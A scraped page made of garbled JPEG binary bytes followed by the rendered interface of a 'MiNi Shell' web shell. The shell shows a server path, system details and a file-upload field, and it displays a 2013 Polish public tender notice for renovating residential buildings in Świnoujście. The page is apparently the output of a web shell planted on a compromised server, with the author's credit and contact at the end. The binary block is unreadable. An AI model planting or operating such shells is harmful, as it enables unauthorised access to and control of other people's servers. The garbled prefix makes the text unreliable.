JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130219/26297-N-2013.html

<p class="kh_header"><b>Świnoujście: Wykonanie robót budowlanych stanowiących realizację projektu ubiegającego się o dofinansowanie w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2007-2013. pn. ,,Mieszkam ładnie i bezpiecznie - renowacja budynków przy ul. Wyszyńskiego 2,7 i 8 w Świnoujściu</b><br>
<b>Numer ogłoszenia: 26297 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Monte Cassino 8, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 91 3212280, 3212631 w. 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zgm.swinoujscie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych stanowiących realizację projektu ubiegającego się o dofinansowanie w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2007-2013. pn. ,,Mieszkam ładnie i bezpiecznie - renowacja budynków przy ul. Wyszyńskiego 2,7 i 8 w Świnoujściu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wykonanie robót budowlanych stanowiących realizację projektu ubiegającego się o dofinansowanie w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2007-2013. pn. ,,Mieszkam ładnie i bezpiecznie - renowacja budynków przy ul. Wyszyńskiego 2,7 i 8 w Świnoujściu, tj. modernizacja budynków  przy ul. Wyszyńskiego 2, 7 i 8  w Świnoujściu poprzez   wykonanie  prac budowlanych w tym dociepleniowo - renowacyjno - izolacyjnych.

1. Zamówienie obejmuje:

1) budynek przy ul. Wyszyńskiego 2 - zakres robót:

a) docieplenie elewacji budynku wraz z niezbędnymi  naprawami elewacji,
b) izolacja pionowa ścian piwnicznych,
c) docieplenie dachu,
d) wzmocnienie stropu piwnicy,
e) docieplenie prześwitu bramowego płytami styropianowymi wraz z robotami naprawczymi,
f) modernizacja klatki schodowej poprzez  poprawę jej izolacyjności termicznej polegająca miedzy innymi na  wymianie stolarki okiennej  oraz drzwiowej,  wraz z robotami naprawczymi  takimi jak wykonanie nowych elementów  stopnic i podstopnic  biegów schodowych  wraz z balustradą schodową,
g) modernizacja instalacji elektrycznej w lokalach nr 2 i nr 3,
h) ulepszenie lokali  mieszkalnych nr  2 i nr 3 poprzez  wydzielenie z części pomieszczeń  łazienek, wykonanie dodatkowych przewodów kominowych do lokali nr 2, nr 3 i nr 4,
i) roboty towarzyszące,
j) wykonanie i przedłożenie Zamawiającemu po zakończeniu prac  świadectwa energetycznego   budynku; 

2) budynek przy ul. Wyszyńskiego 7 - zakres robót:

a) docieplenie  elewacji, (tylna - docieplenie zewnętrzne, przednia - docieplenie wewnętrzne)  wraz z niezbędnymi  naprawami elewacji,
b) izolacja pionowa ścian piwnicznych,
c) izolacja pozioma metodą iniekcji,
d) roboty naprawcze w piwnicy,
e) docieplenie prześwitu bramowego płytami styropianowymi wraz z robotami naprawczymi,
f) modernizacja klatki schodowej poprzez  poprawę jej izolacyjności termicznej polegająca miedzy innymi na  wymianie stolarki okiennej w pomieszczeniach na klatce schodowej,  wymianie  stolarki drzwiowej, budowie dwóch pionów kominowych  wraz z wykonaniem robót  naprawczych,
g) roboty naprawcze dachu,
h) docieplenie stropu poddasza,
i)  ulepszenie lokali  mieszkalnych,  poprzez  wydzielenie z części pomieszczeń  łazienek (w lokalu nr 8 - od strony ulicy i w lokalu nr 4),
j) roboty towarzyszące,
k) wykonanie i przedłożenie Zamawiającemu po zakończeniu prac  świadectwa energetycznego budynku;

3) budynek przy ul. Wyszyńskiego 8 - zakres robót:

a) docieplenie  elewacji, (tylna  - ocieplenie zewnętrzne, przednia - ocieplenie wewnętrzne) wraz z niezbędnymi  naprawami elewacji,
b) izolacja pionowa ścian piwnicznych,
c) roboty naprawcze w piwnicy,
d) wykonanie dodatkowych pionów kominowych wraz z wykonaniem robót  naprawczych,
e) docieplenie stropu poddasza,
f) docieplenie prześwitu bramowego wraz z robotami naprawczymi,
g) modernizacja klatki schodowej  poprzez poprawę jej izolacyjności termicznej polegająca miedzy innymi na  wymianie stolarki okiennej w pomieszczeniach na klatce schodowej,  wymianie  stolarki drzwiowej, wzmocnieniu elementów wykończenia  posadzki parteru ,wykonaniu nowych elementów stopnic, podstopnic,  podestów  biegów schodowych wraz z balustrada schodową,
h) wykonanie i przedłożenie Zamawiającemu po zakończeniu prac  świadectwa energetycznego  budynku. 

4) Dodatkowe czynności obejmujące wszystkie budynki objęte zamówieniem:

a)  Wykonawca musi zapewnić kierownika budowy,
b)  Wykonawca ponosi opłaty związane z zajęciem chodnika,
c)  Wykonawca musi zapewnić wywóz materiałów rozbiórkowych,
d)  Wykonawca ponosi opłaty zużycia wody i energii elektrycznej,
e)  Wykonawca musi zabezpieczyć schody, balustrady, stolarkę okienną przed zniszczeniem. 

5) Uwagi: 

a) Przewidziane w dokumentacji technicznej w budynku przy ul. Wyszyńskiego 7 wydzielenie łazienki w lokalu nr 8  (w pomieszczeniu kuchni od strony podwórka) nie podlega  wykonaniu.
b) Zobowiązuje się Wykonawcę do wykonania i fakturowania robót zgodnie z 
harmonogramem wskazanym przez Zamawiającego.
c) Wykonawca  powinien  wykonywać prace budowlane w następującej kolejności:   
budynek przy ul. Wyszyńskiego 2, następnie przy ul. Wyszyńskiego 7 i przy ul. Wyszyńskiego 8.  
d) Zamawiający nie zapewnia dodatkowego pomieszczenia dla Wykonawcy służącego  jako zaplecze budowy.

2. Przedmiot zamówienia został opisany w:

budynek przy ul. Wyszyńskiego 2:

1) dokumentacji technicznej wykonanej przez:
- branża architektura - opracowanie mgr inż. arch. Iwona Całus -    zał. nr 1 do SIWZ, 
- branża konstrukcja - opracowanie mgr inż. Marcin Kubiczak  - zał. nr  1a do SIWZ,
- branża instalacje sanitarne - opracowanie inż. Grażyna Sztylet - zał nr 1b do SIWZ,
 - branża instalacje elektryczne - opracowanie  przez mgr inż. Adam Białkowski   - zał. nr 1c do SIWZ,

2) przedmiarze robót - załączniki nr 2, 2a, 2b i 2c do SIWZ  (przedmiary robót należy traktować jako uzupełnienie do dokumentacji, której zapisy są podstawą do określenia zakresu prac- podstawą do wyceny jest dokumentacja techniczna),

3) specyfikacji technicznej wykonania i odbioru robót budowlanych   - zał. nr 3 do SIWZ,

4) audyt energetyczny budynku - zał. nr 4 do SIWZ;

budynek przy ul. Wyszyńskiego 7:

1) dokumentacji technicznej wykonanej przez:
- branża architektura - opracowanie mgr inż. arch. Iwona Całus -    zał. nr 1 do SIWZ, 
- branża konstrukcja- opracowanie mgr inż. Marcin Kubiczak  - zał. nr  1a do SIWZ,

2) przedmiarze robót - załącznik nr 2 do SIWZ (przedmiary robót należy traktować jako uzupełnienie do dokumentacji, której zapisy są podstawą do określenia zakresu prac - podstawą do wyceny jest dokumentacja techniczna),

3) specyfikacji technicznej wykonania i odbioru robót budowlanych   - zał. nr 3 do SIWZ, 

4) audyt energetyczny budynku - zał. nr 4 do SIWZ; 

budynek przy ul. Wyszyńskiego 8:

1) dokumentacji technicznej wykonanej przez:
 - branża architektura - opracowanie mgr inż. arch. Iwona Całus -    zał. nr 1 do SIWZ, 
 - branża konstrukcja - opracowanie mgr inż. Marcin Kubiczak  - zał. nr  1a do SIWZ,

2) przedmiarze robót - załącznik nr 2 do SIWZ (przedmiary robót należy traktować jako uzupełnienie do dokumentacji, której zapisy są podstawą do określenia zakresu prac - podstawą do wyceny jest dokumentacja techniczna),

3) specyfikacji technicznej wykonania i odbioru robót budowlanych   - zał. nr 3 do SIWZ,

4) audyt energetyczny budynku - zał. nr 4 do SIWZ.

Wykonawca wykona modernizację budynków zgodnie z dokumentacją techniczną,  ze specyfikacją techniczną wykonania  i odbioru robót, przedmiarem robót i zgodnie ze współczesną wiedzą, sztuką budowlaną  i SIWZ.
Wszystkie wskazane z nazwy wyroby/materiały użyte w specyfikacji technicznej wykonania  i odbioru robót budowlanych i przedmiarze robót należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza składanie ofert równoważnych z zastrzeżeniem, że uwzględnione w wycenie produkty nie odbiegają jakością, standardem i parametrami technicznymi od założonych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia dotychczasowemu Wykonawcy zamówień uzupełniających, nie objętych przedmiotem zamówienia podstawowego, nie przekraczających łącznie 50% wartości realizowanego zamówienia, w przypadku wystąpienia okoliczności określonych w art. 67 ust. 1 pkt 6 ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.32.00.00-6, 45.26.25.22-6, 45.42.10.00-4, 45.45.31.00-8, 45.44.21.00-8, 45.26.10.00-4, 45.23.24.60-4, 45.31.00.00-3, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 40.000,00 zł               (słownie: czterdzieści tysięcy złotych 00/100) przed upływem terminu składania ofert na warunkach określonych w art. 45 ustawy.
Wadium może być wnoszone w formach wskazanych w art. 45 ust.6 ustawy.
2. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy  ZGM-u w PEKAO SA Oddział w Świnoujściu  nr 63 1240 3914 1111 0000 3088 5813  z dopiskiem WADIUM - przetarg  ,,Renowacja budynków przy ul. Wyszyńskiego 2,7 i 8 w Świnoujściu.                   
3. Kopię dokumentu potwierdzającego zabezpieczenie oferty akceptowaną formą wadium w stosunku do formy zabezpieczenia określonej w art. 45 ust. 6 pkt 1 ustawy lub oryginał dokumentu w stosunku do form zabezpieczenia określonych w art. 45 ust. 6 pkt 2 do 5 ustawy, Wykonawca  zobowiązany jest załączyć do oferty jak określono w punkcie IX ppkt 8 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawcy, którzy posiadają doświadczenie zawodowe w wykonywaniu tego typu prac  tzn. Wykonawcy, którzy wykażą, że w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali należycie co najmniej dwa zamówienia odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia, tj. wykonali roboty budowlane o wartości nie mniejszej niż 1.000.000,00 zł każda. Na potwierdzenie spełnienia tego warunku Wykonawca przedstawi wykaz wykonanych 2 robót  z podaniem ich zakresu, wartości oraz daty i miejsca wykonania oraz kopie protokołów odbioru tych prac przez Inwestora (zał. nr 6 do SIWZ);
2) Wykonawcy, którzy dysponują osobami posiadającymi  odpowiadające specyfice prac uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno -  budowlanej, elektrycznej i sanitarnej oraz posiadającymi co najmniej 2-letnią praktykę zawodową w tego typu pracach (zał. nr 7 do SIWZ);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawcy, którzy udzielą co najmniej 36-miesięcznej  gwarancji na wykonane prace - materiały i robociznę;
2) Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
3) Wykonawcy,  którzy  wypełnili oraz podpisali formularz ofertowy (zał. nr 9 do SIWZ).
4) oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, oraz  ich doświadczenie - według zał. nr 8 do SIWZ,
5) potwierdzona za zgodność z oryginałem kserokopia opłaconej polisy, a w przypadku  jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,  w wysokości min. 1.300.000,00 zł,
6) oferta sporządzona według wzoru formularza oferty  - według zał. nr 9 do SIWZ,
7) kopia dokumentu potwierdzającego zabezpieczenie oferty akceptowalną formą wadium.
   
W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wnoszone jest jedno wadium.
Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność                   z oryginałem przez Wykonawcę. 
Ocena spełnienia powyższych warunków będzie dokonywana według zasady: spełnia/nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zgm.swinoujscie.pl/ > Ogłoszenia > Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest na stronie internetowej i w wersji papierowej ( odbiór osobisty) w Zakładzie Gospodarki Mieszkaniowej ul. Monte Cassino 8, pokój nr 30, bądź przesyłką za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2013 godzina 10:00, miejsce: Zakład Gospodarki Mieszkaniowej ul. Monte Cassino 8- sekretariat, codziennie z wyjątkiem sobót, niedziel i dni wolnych od pracy w godzinach 7.30 do 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com